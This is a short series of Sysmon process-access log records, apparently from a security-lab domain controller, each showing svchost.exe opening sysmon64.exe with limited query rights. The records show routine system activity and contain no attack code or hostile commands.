{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
